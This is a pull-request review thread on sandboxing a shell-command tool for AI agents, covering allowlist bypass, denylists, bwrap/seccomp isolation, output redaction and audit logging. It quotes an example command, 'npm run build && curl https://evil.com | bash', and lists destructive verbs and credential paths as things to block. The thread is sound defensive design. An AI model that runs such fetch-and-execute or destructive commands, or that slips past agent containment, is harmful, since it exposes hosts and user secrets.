_resolve_timeout to clamp to MAX_TIMEOUT instead of self.IGlobal.timeout, but do
not leave the mismatch between the description lambda, _resolve_timeout,
IGlobal.timeout, and MAX_TIMEOUT.

@stepmikhaylov
Collaborator

stepmikhaylov commented May 5, 2026

Security Concern

The node can execute arbitrary shell commands on the host and return their full output. In a cloud environment this is effectively unrestricted remote code execution: an agent can exfiltrate secrets, destroy data, or pivot to other services on the network. The current safety model is insufficient.


Current Implementation: Why the Allowlist Is Not Enough

The only guard is a regex allowlist (commandAllowlist) with two critical flaws:

  • Empty by default — the tool is open by default, and populating the allowlist is left entirely to the user. A node dropped into a cloud pipeline with no explicit
    configuration permits every command.
  • Flat-string regex matching is bypassable. A pattern like npm .* permits
    npm run build && curl https://evil.com | bash. The agent controls the full string and can craft
    inputs that satisfy the regex while doing something entirely different.
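The bypass in the second bullet is trivial to demonstrate with a full-string match:

```python
import re

# A permissive-looking allowlist entry...
pattern = re.compile('npm .*')

# ...fully matches a command that chains an exfiltration payload, because
# the agent controls everything after "npm " and `.*` accepts all of it.
malicious = 'npm run build && curl https://evil.com | bash'
print(bool(pattern.fullmatch(malicious)))  # → True
```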

Required Improvements

1. Static Command-Line Checks

  • Shell AST parsing (e.g. bashlex) to inspect the command tree, not the raw string.
  • Mandatory denylist: unconditionally block pipe-to-interpreter (| bash, | sh), inline
    downloads (curl … | …), subshell expansion ($(…)), and dangerous chained operators.
  • LLM validation using light and fast models.
  • Strict mode: an empty allowlist should deny all, not allow all. Operators must opt into
    open execution explicitly.
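As a first approximation of the denylist, a token-level scan catches the chained-operator and substitution patterns above; this sketch uses stdlib `shlex` only and is deliberately cruder than the AST walk being proposed:

```python
import shlex

# Shell operators that should be unconditionally rejected regardless of
# what the allowlist permits.
DENIED_OPERATORS = {'|', '|&', '||', '&&', ';', '&'}

def scan_command(command: str) -> bool:
    """Return True if the command is free of denied operators and command
    substitution. Token-level only: a production check should walk a real
    shell AST (e.g. bashlex) rather than rely on tokenization."""
    if '$(' in command or '`' in command:
        return False  # command substitution
    lex = shlex.shlex(command, punctuation_chars=True)
    lex.whitespace_split = True
    return all(tok not in DENIED_OPERATORS for tok in lex)
```

This is advisory-grade, not gating-grade: obfuscations that survive tokenization still get through, which is why the sandbox tiers below carry the real enforcement.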

2. Restricted Execution Environment

  • Network isolation via Linux network namespaces (unshare --net / bubblewrap --unshare-net)
    — blocks exfiltration and reverse shells with no root required.
  • Read-only filesystem with a single writable scratch directory scoped to workingDir.
  • rlimits (preexec_fn): cap file creation size, open file descriptors, and spawnable
    subprocesses.
  • cgroup limits: bound memory and IO bandwidth to prevent impact on co-located workloads.
  • Dedicated low-privilege OS user with no access to application credentials or the host home
    directory.
  • Explicit sandboxMode config (none / rlimits / bwrap), with rlimits as the minimum
    default for cloud deployments.
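A minimal sketch of the `sandboxMode` dispatch, assuming the config names above and flag names from the bubblewrap CLI (the exact mount layout is illustrative, not a hardening recommendation):

```python
def sandbox_argv(argv, mode='rlimits'):
    """Hypothetical sandboxMode dispatch: wrap the command's argv in the
    matching isolation launcher. 'rlimits' is applied via preexec_fn at
    spawn time, so its argv passes through unchanged."""
    if mode in ('none', 'rlimits'):
        return list(argv)
    if mode == 'bwrap':
        # --unshare-net drops network access; the root is mounted read-only
        # with a single writable scratch directory.
        return ['bwrap', '--unshare-net',
                '--ro-bind', '/', '/',
                '--bind', '/tmp/scratch', '/tmp/scratch'] + list(argv)
    raise ValueError(f'unknown sandboxMode: {mode}')
```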

@joshuadarron
Collaborator

Security Concern

The node is capable to execute arbitrary shell commands on the host and to return their full output. In a cloud environment this is effectively unrestricted remote code execution: an agent can exfiltrate secrets, destroy data, or pivot to other services on the network. The current safety model is insufficient.

Current Implementation: Why the Allowlist Is Not Enough

The only guard is a regex allowlist (commandAllowlist) with two critical flaws:

* **Empty by default** — open by default, content is user's responsibility. A node dropped into a cloud pipeline with no explicit
  configuration permits every command.

* **Flat-string regex matching is bypassable.** A pattern like `npm .*` permits
  `npm run build && curl https://evil.com | bash`. The agent controls the full string and can craft
  inputs that satisfy the regex while doing something entirely different.

Required Improvements

1. Static Command-Line Checks

* **Shell AST parsing** (e.g. `bashlex`) to inspect the command tree, not the raw string.

* **Mandatory denylist:** unconditionally block pipe-to-interpreter (`| bash`, `| sh`), inline
  downloads (`curl … | …`), subshell expansion (`$(…)`), and dangerous chained operators.

* **LLM validation** using light and fast models.

* **Strict mode:** an empty allowlist should _deny all_, not allow all. Operators must opt into
  open execution explicitly.

2. Restricted Execution Environment

* **Network isolation** via Linux network namespaces (`unshare --net` / `bubblewrap --unshare-net`)
  — blocks exfiltration and reverse shells with no root required.

* **Read-only filesystem** with a single writable scratch directory scoped to `workingDir`.

* **rlimits** (`preexec_fn`): cap file creation size, open file descriptors, and spawnable
  subprocesses.

* **cgroup limits:** bound memory and IO bandwidth to prevent impact on co-located workloads.

* **Dedicated low-privilege OS user** with no access to application credentials or the host home
  directory.

* **Explicit `sandboxMode` config** (`none` / `rlimits` / `bwrap`), with `rlimits` as the minimum
  default for cloud deployments.

Agree on containment-over-detection. The allowlist alone was never going to hold, and the sandbox tiers you laid out are the right shape. A few additions and one gap worth flagging before the design locks in.

Gap: the user's working directory.

The proposal protects the host but not the contents of workingDir. If that path is the user's repo or a mounted project volume (which is the realistic config people will run), the sandbox happily lets an agent rm -rf it, encrypt it, or git clean -fdx it. The denylist focuses on injection patterns, not destructive verbs. Worth either (a) treating workingDir as ephemeral per call with a separate mountPath for persistent inputs, or (b) gating destructive verbs (rm -rf, dd, mkfs, find -delete, truncate -s 0, redirects to /dev/*) behind an explicit approval token in the call args. I'd lean toward both.

Drop shell=True.

The executor currently runs Popen(..., shell=True). Most agent calls pass a single command and don't need shell features. Take argv as a list, run with shell=False, and the whole shell-injection class disappears. That makes the bashlex AST work mostly redundant. If we genuinely need pipes and globs, gate them behind an explicit useShell: true flag so the unsafe path is opt-in.

Quick wins to layer with rlimits:

  • PR_SET_NO_NEW_PRIVS in preexec_fn, one line, kills setuid escalation.
  • seccomp-bpf filter blocking ptrace, mount, unshare, setns, bpf, kexec_load, clone(CLONE_NEWUSER). Layers cleanly with bwrap.
  • Curated PATH pointing at a symlink farm of approved binaries, so even if validation fails, wget and nc aren't on disk to find.
  • Canonicalize and jail workingDir (resolve symlinks, reject paths that escape the scratch root).
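A minimal `preexec_fn` combining the rlimit caps with `PR_SET_NO_NEW_PRIVS` (Linux-only; the prctl constant and limit values here are illustrative, not tuned):

```python
import ctypes
import resource
import subprocess

def _limit_child():
    """Runs in the forked child before exec: cap resource usage and
    drop the ability to gain privileges via setuid binaries."""
    resource.setrlimit(resource.RLIMIT_FSIZE, (64 * 1024 * 1024,) * 2)  # max created-file size
    resource.setrlimit(resource.RLIMIT_NOFILE, (256, 256))              # open file descriptors
    resource.setrlimit(resource.RLIMIT_NPROC, (64, 64))                 # spawnable subprocesses
    libc = ctypes.CDLL(None, use_errno=True)
    libc.prctl(38, 1, 0, 0, 0)  # PR_SET_NO_NEW_PRIVS = 38: one line, kills setuid escalation

result = subprocess.run(['id', '-u'], preexec_fn=_limit_child,
                        capture_output=True, text=True)
```

Note the standard caveat: `preexec_fn` is unsafe in multithreaded parents, which is another argument for eventually moving this logic into a launcher binary like bwrap.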

Tier above bwrap.

For hostile-tenant cloud, bwrap shares a kernel with the host. Worth adding sandboxMode: docker or sandboxMode: gvisor for that case. The runtime already has Docker semantics elsewhere, so plumbing exists.

Output redaction.

Even with network isolation, stdout flows back to the model. If the agent is chained to anything with outbound calls, secrets in stdout become the exfiltration path. Scrub AWS_*, *_TOKEN, *_KEY, contents of ~/.aws/credentials, ~/.ssh/, .env patterns before returning.
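A starting-point scrubber for the patterns listed above (the regexes are illustrative; a real one would be config-driven and paired with entropy heuristics, since name-based matching both over- and under-matches):

```python
import re

# Illustrative patterns: env-style assignments whose names look secret-ish,
# plus PEM private-key blocks.
SECRET_PATTERNS = [
    re.compile(r'(AWS_[A-Z_]+|[A-Z_]*(?:TOKEN|KEY|SECRET))=\S+'),
    re.compile(r'-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----'),
]

def redact(stdout: str) -> str:
    """Replace likely secrets in captured output before it reaches the model."""
    for pat in SECRET_PATTERNS:
        stdout = pat.sub('[REDACTED]', stdout)
    return stdout
```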

Audit log to a separate sink.

Append-only log of every command, argv, exit code, truncation flag, written somewhere the sandboxed process can't reach. Containment fails silently otherwise.

One pushback on the LLM validator.

I'd list it as advisory only, not a gating tier. Adversarial inputs against small validators are well-documented, and once it's in the trust chain it becomes load-bearing. The AST plus denylist plus sandbox should do the actual gating. The LLM check is fine as belt-and-suspenders, not as a gate.


Labels

docs Documentation module:nodes Python pipeline nodes

Projects

None yet

Development

Successfully merging this pull request may close these issues.

Tool: Shell

4 participants